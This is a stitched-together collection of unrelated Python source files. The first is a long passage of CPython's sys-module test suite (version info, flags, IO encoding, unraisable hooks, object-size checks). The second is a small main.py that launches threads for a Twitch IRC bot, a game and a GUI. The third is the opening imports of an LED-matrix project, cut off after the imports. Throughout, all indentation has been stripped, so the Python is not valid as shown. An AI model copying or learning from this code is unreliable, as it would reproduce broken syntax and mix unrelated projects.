self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
# Output of sys._debugmallocstats() depends on configure flags.
# The sysconfig vars are not available on Windows.
if sys.platform != "win32":
with_freelists = sysconfig.get_config_var("WITH_FREELISTS")
with_pymalloc = sysconfig.get_config_var("WITH_PYMALLOC")
if with_freelists:
self.assertIn(b"free PyDictObjects", err)
if with_pymalloc:
self.assertIn(b'Small block threshold', err)
if not with_freelists and not with_pymalloc:
self.assertFalse(err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
self.assertEqual(os.path.normpath(sys._stdlib_dir),
os.path.normpath(expected))
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just classname, and the module names appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj");
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('6Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('6Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
def func():
return sys._getframe()
x = func()
check(x, size('3Pi3c8P2iciP'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P4c8P2iciP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn12PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'6P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 15*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 13*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
main.py
|
from threading import Thread
from ircbot import Bot
from play_game import Game
from queue import MyQ
from locals import *
from gui import Gui
def main():
"""
Creates a queue that keeps track of commands to be entered into the game.
Creates three more objects and spins up a thread for each:
1 - The IRC bot, which monitors the Twitch IRC channel for new actions to queue.
2 - The game thread, which pops entries from the queue if they exist, and runs
them in the game.
3 - The gui thread, which runs a simple (read: ugly) gui that displays the possible
actions and their votes, and the actions in the queue.
TODO: There's no way of stopping all of these threads at once yet.
I just have to close my shell, which is bad. Need to put some conditions
that watch for Ctrl-c in all of the threads, or something like that.
"""
queue = MyQ()
bot = Bot(BOT_OWNER, NICK, CHANNEL, SERVER, PORT, AUTH, queue)
bot_thread = Thread(target=bot.run)
bot_thread.start()
game = Game(queue)
game_thread = Thread(target=game.run_game)
game_thread.start()
gui_thread = Thread(target=start_gui, args=(queue,))
gui_thread.start()
def start_gui(queue):
Gui(queue)
if __name__ == '__main__':
main()
|
MAIN.py
|
#!/usr/bin/python3
import signal
import threading
from time import sleep
import redis
from features.binaryclock import BinaryClock
from features.mona import Mona
from features.snow import Snow
from field import Field
from highscorelist import *
from painter import RGB_Field_Painter, Led_Matrix_Painter
from features.rainbowclock import Clock
from features.rainbowclock import Rainbowclock
from features.snake_main import Snake_Main
